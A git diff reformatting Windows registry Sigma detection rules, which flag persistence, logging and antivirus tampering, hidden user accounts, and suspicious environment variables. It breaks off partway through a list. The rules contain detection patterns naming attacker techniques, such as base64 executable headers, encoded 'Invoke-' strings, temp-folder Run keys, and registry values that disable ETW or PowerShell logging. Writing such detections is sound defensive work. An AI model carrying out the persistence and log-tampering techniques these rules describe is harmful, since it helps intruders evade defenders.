a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Shim Database In Uncommon Location id: 6b6976a3-b0e6-4723-ac24-ae38a737af41 status: experimental -description: Detects the installation of a new shim database where the file is located - in a non-default location +description: Detects the installation of a new shim database where the file is located in a non-default location references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml index 611354f25..025dc306a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via TypedPaths id: 086ae989-9ca6-4fe7-895a-759c5544f247 status: experimental -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry from a non standard application. Which might indicate persistence - attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml index 4974febf9..58261c6f0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Excel Add-in - Registry id: 961e33d1-4f86-4fcf-80ab-930a708b2f82 status: experimental -description: Detect potential persistence via the creation of an excel add-in (XLL) - file to make it run automatically when Excel is started. +description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. references: - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence diff --git a/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml index 63d1906e5..d2b9a2323 100644 --- a/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml @@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Associations Tamper id: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 status: experimental -description: Detects tampering with attachment manager settings policies associations - to lower the default file type risks (See reference for more information) +description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 @@ -25,7 +24,7 @@ detection: NewValue: DWORD (0x00006152) selection_value_low_risk_filetypes: ObjectName|endswith: \LowRiskFileTypes - NewValue|contains: + NewValue|contains: # Add more as you see fit - .zip; - .rar; - .exe; diff --git a/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml index 0c1dfc308..202c6b17c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml @@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Attachments Tamper id: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a status: experimental -description: Detects tampering with attachment manager settings policies attachments - (See reference for more information) +description: Detects tampering with attachment manager settings policies attachments (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml index 963cda87b..870840ed1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml @@ -1,11 +1,10 @@ title: PowerShell Script Execution Policy Enabled id: 8218c875-90b9-42e2-b60d-0b0069816d10 related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: derived + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 + type: derived status: experimental -description: Detects the enabling of the PowerShell script execution policy. Once - enabled, this policy allows scripts to be executed. +description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. references: - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml index 6188e4002..c1e296e42 100644 --- a/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering id: fad91067-08c5-4d1a-8d8c-d96a21b37814 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: experimental -description: Detects changes to the PowerShell execution policy in order to bypass - signing requirements for script execution +description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -32,6 +31,7 @@ detection: - Bypass - Unrestricted filter_main_svchost: + # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example. ProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml index 83a165593..dc0490b1a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml @@ -1,9 +1,7 @@ title: PowerShell Logging Disabled Via Registry Key Tampering id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 status: experimental -description: Detects changes to the registry for the currently logged-in user. In - order to disable PowerShell module logging, script block logging or transcription - and script execution logging +description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml b/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml index c120d95dd..42f0fa3fe 100644 --- a/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml +++ b/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -22,8 +21,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" - and its subkey must be monitored' + definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" and its subkey must be monitored' detection: registry_set: EventID: 4657 diff --git a/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml index 2f7f9ec5b..dd1d34816 100644 --- a/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml +++ b/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml @@ -1,13 +1,12 @@ title: Usage of Renamed Sysinternals Tools - RegistrySet id: 8023f872-3f1d-4301-a384-801889917ab4 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: f50f3c09-557d-492d-81db-9064a8d4e211 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: f50f3c09-557d-492d-81db-9064a8d4e211 + type: similar status: experimental -description: Detects non-sysinternals tools setting the "accepteula" key which normally - is set on sysinternals tool execution +description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -53,9 +52,8 @@ detection: - \ADExplorer.exe - \ADExplorer64.exe filter_optional_null: - ProcessName: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + ProcessName: + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml index db3fbf4d6..a73ec2a57 100644 --- a/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For rpcrt4.dll id: 90f342e1-1aaa-4e43-b092-39fda57ed11e status: experimental -description: Detects changes to the "ExtErrorInformation" key in order to disable - ETW logging for rpcrt4.dll +description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,9 @@ detection: selection: ObjectName|endswith: \Microsoft\Windows NT\Rpc\ExtErrorInformation NewValue: - - DWORD (0x00000000) - - DWORD (0x00000002) + # This is disabled by default for some reason + - DWORD (0x00000000) # Off + - DWORD (0x00000002) # Off with exceptions condition: registry_set and selection falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml b/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml index d1f9491ed..6086e1008 100644 --- a/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml +++ b/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml @@ -1,8 +1,7 @@ title: ScreenSaver Registry Key Set id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce status: experimental -description: Detects registry key established after masqueraded .scr file execution - using Rundll32 through desk.cpl +description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl references: - https://twitter.com/VakninHai/status/1517027824984547329 - https://twitter.com/pabraeken/status/998627081360695297 diff --git a/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml b/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml index a095f4222..d78d67175 100644 --- a/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml @@ -1,8 +1,7 @@ title: ServiceDll Hijack id: 612e47e9-8a59-43a6-b404-f48683f45bd6 status: experimental -description: Detects changes to the "ServiceDLL" value related to a service in the - registry. This is often used as a method of persistence. +description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ diff --git a/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml index 7f6a87edf..ffe3a9057 100644 --- a/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For SCM id: 4f281b83-0200-4b34-bf35-d24687ea57c2 status: experimental -description: Detects changes to the "TracingDisabled" key in order to disable ETW - logging for services.exe (SCM) +description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml b/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml index 3e4e6341d..3a80690de 100644 --- a/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml @@ -1,8 +1,7 @@ title: Registry Explorer Policy Modification id: 1c3121ed-041b-4d97-a075-07f54f20fb4a status: test -description: Detects registry modifications that disable internal tools or functions - in explorer (malware like Agent Tesla uses this technique) +description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml index 959b82438..7c2f6cfa2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via New SIP Provider id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/codesigning.html - https://github.com/gtworek/PSBits/tree/master/SIP @@ -33,6 +32,7 @@ detection: - \$DLL filter: NewValue: + # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll filter_poqexec: diff --git a/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml index 3da4555d7..82f724b00 100644 --- a/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml @@ -25,7 +25,6 @@ detection: NewValue: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some FP may occur when the feature is disabled by the AV itself, you should - always investigate if the action was legitimate + - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml b/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml index f5f5c36f2..bfac91111 100644 --- a/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml +++ b/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml @@ -1,12 +1,10 @@ title: Hiding User Account Via SpecialAccounts Registry Key id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd related: - - id: 8a58209c-7ae6-4027-afb0-307a78e4589a - type: obsoletes + - id: 8a58209c-7ae6-4027-afb0-307a78e4589a + type: obsoletes status: test -description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to - "0" in order to hide user account from being listed on the logon screen. +description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md @@ -24,7 +22,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList NewValue: DWORD (0x00000000) condition: registry_set and selection diff --git a/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml b/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml index ff362b93f..9e428f046 100644 --- a/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml +++ b/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml @@ -1,8 +1,7 @@ title: Activate Suppression of Windows Security Center Notifications id: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 status: experimental -description: Detect set Notification_Suppress to 1 to disable the Windows security - center notification +description: Detect set Notification_Suppress to 1 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml index 106f02da6..00dda3eaa 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml @@ -1,9 +1,7 @@ title: Suspicious Keyboard Layout Load id: 34aa0252-6039-40ff-951f-939fd6ce47d8 status: test -description: Detects the keyboard preload installation with a suspicious keyboard - layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems - maintained by US staff only +description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only references: - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files @@ -16,8 +14,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload - subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' + definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' detection: registry_set: EventID: 4657 @@ -27,12 +24,11 @@ detection: - \Keyboard Layout\Preload\ - \Keyboard Layout\Substitutes\ NewValue|contains: - - 00000429 - - 00050429 - - 0000042a + - 00000429 # Persian (Iran) + - 00050429 # Persian (Iran) + - 0000042a # Vietnamese condition: registry_set and selection_registry falsepositives: - - Administrators or users that actually use the selected keyboard layouts (heavily - depends on the organisation's user base) + - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml b/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml index b8ff80487..a871ce1eb 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml @@ -1,9 +1,7 @@ title: Potential PendingFileRenameOperations Tamper id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a status: test -description: Detect changes to the "PendingFileRenameOperations" registry key from - uncommon or suspicious images lcoations to stage currently used files for rename - after reboot. +description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot. references: - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6 - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/ @@ -23,7 +21,7 @@ detection: EventID: 4657 Channel: Security selection_main: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \CurrentControlSet\Control\Session Manager\PendingFileRenameOperations selection_susp_paths: ProcessName|contains: diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml b/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml index b97ce62f5..45c2e0ae6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml @@ -1,8 +1,7 @@ title: Suspicious Printer Driver Empty Manufacturer id: e0813366-0407-449a-9869-a2db1119dc41 status: test -description: Detects a suspicious printer driver installation with an empty Manufacturer - value +description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 author: Florian Roth (Nextron Systems) @@ -34,7 +33,6 @@ detection: ObjectName|contains: \Version-3\PDF24\ condition: registry_set and (selection and not 1 of filter_*) falsepositives: - - Alerts on legitimate printer drivers that do not set any more details in the - Manufacturer value + - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml index 5fb754e1d..4a74b2801 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Explorer Run Key id: b7916c2a-fa2f-4795-9477-32b731f70f11 status: test -description: Detects a possible persistence mechanism using RUN key for Windows Explorer - and pointing to a suspicious folder +description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder references: - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ author: Florian Roth (Nextron Systems), oscd.community diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml index 48555c5d2..aa78bd7fb 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -1,8 +1,7 @@ title: New RUN Key Pointing to Suspicious Folder id: 02ee49e2-e294-4d0f-9278-f5b3212fc588 status: experimental -description: Detects suspicious new RUN key element pointing to an executable in a - suspicious folder +description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing @@ -23,20 +22,20 @@ detection: - \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ - \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ selection_details: - - NewValue|contains: - - :\$Recycle.bin\ - - :\Temp\ - - :\Users\Default\ - - :\Users\Desktop\ - - :\Users\Public\ - - :\Windows\Temp\ - - \AppData\Local\Temp\ - - '%temp%\' - - '%tmp%\' - - NewValue|startswith: - - '%Public%\' - - wscript - - cscript + - NewValue|contains: + - :\$Recycle.bin\ + - :\Temp\ + - :\Users\Default\ + - :\Users\Desktop\ + - :\Users\Public\ + - :\Windows\Temp\ + - \AppData\Local\Temp\ + - '%temp%\' + - '%tmp%\' + - NewValue|startswith: + - '%Public%\' + - wscript + - cscript condition: registry_set and (all of selection_*) fields: - ProcessName diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml b/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml index 9ffc58bfd..d4547c9d1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml @@ -1,13 +1,9 @@ title: Suspicious Service Installed id: f2485272-a156-4773-82d7-1d178bc4905b status: test -description: 'Detects installation of NalDrv or PROCEXP152 services via registry-keys - to non-system32 folders. - - Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), - which uses KDU (https://github.com/hfiref0x/KDU) - - ' +description: | + Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. + Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) references: - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ author: xknow (@xknow_infosec), xorxes (@xor_xes) @@ -29,6 +25,7 @@ detection: - \REGISTRY\MACHINE\System\CurrentControlSet\Services\PROCEXP152\ImagePath filter: ProcessName|endswith: + # Please add the full paths that you use in your environment to tighten the rule - \procexp64.exe - \procexp.exe - \procmon64.exe @@ -38,8 +35,6 @@ detection: NewValue|contains: \WINDOWS\system32\Drivers\PROCEXP152.SYS condition: registry_set and (selection and not filter) falsepositives: - - Other legimate tools using this service names and drivers. Note - clever attackers - may easily bypass this detection by just renaming the services. Therefore - just Medium-level and don't rely on it. + - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml b/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml index 431e25988..de9778b30 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml @@ -1,8 +1,7 @@ title: Modify User Shell Folders Startup Value id: 9c226817-8dc9-46c2-a58d-66655aafd7dc status: experimental -description: Detect modification of the startup key to a path where a payload could - be stored to be launched during startup +description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup references: - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md author: frack113 @@ -20,8 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User - Shell Folders + ObjectName|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ObjectName|endswith: Startup condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml b/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml index 4e20df8f1..5d54b9c52 100644 --- a/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml +++ b/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml @@ -1,8 +1,7 @@ title: Suspicious Environment Variable Has Been Registered id: 966315ef-c5e1-4767-ba25-fce9c8de3660 status: test -description: Detects the creation of user-specific or system-wide environment variables - via the registry. Which contains suspicious commands and strings +description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings references: - https://infosec.exchange/@sbousseaden/109542254124022664 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,39 +20,43 @@ detection: selection_main: ObjectName|contains: \Environment\ selection_details: - - NewValue: - - powershell - - pwsh - - NewValue|contains: - - \AppData\Local\Temp\ - - C:\Users\Public\ - - TVqQAAMAAAAEAAAA - - TVpQAAIAAAAEAA8A - - TVqAAAEAAAAEABAA - - TVoAAAAAAAAAAAAA - - TVpTAQEAAAAEAAAA - - SW52b2tlL - - ludm9rZS - - JbnZva2Ut - - SQBuAHYAbwBrAGUALQ - - kAbgB2AG8AawBlAC0A - - JAG4AdgBvAGsAZQAtA - - NewValue|startswith: - - SUVY - - SQBFAF - - SQBuAH - - cwBhA - - aWV4 - - aQBlA - - R2V0 - - dmFy - - dgBhA - - dXNpbm - - H4sIA - - Y21k - - cABhAH - - Qzpc - - Yzpc + - NewValue: + - powershell + - pwsh + - NewValue|contains: + # Add more suspicious strings in env variables below + - \AppData\Local\Temp\ + - C:\Users\Public\ + # Base64 MZ Header + - TVqQAAMAAAAEAAAA # MZ.......... + - TVpQAAIAAAAEAA8A + - TVqAAAEAAAAEABAA + - TVoAAAAAAAAAAAAA + - TVpTAQEAAAAEAAAA + # Base64 Invoke- (UTF-8) + - SW52b2tlL + - ludm9rZS + - JbnZva2Ut + # Base64 Invoke- (UTF-16LE) + - SQBuAHYAbwBrAGUALQ + - kAbgB2AG8AawBlAC0A + - JAG4AdgBvAGsAZQAtA + - NewValue|startswith: # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 + - 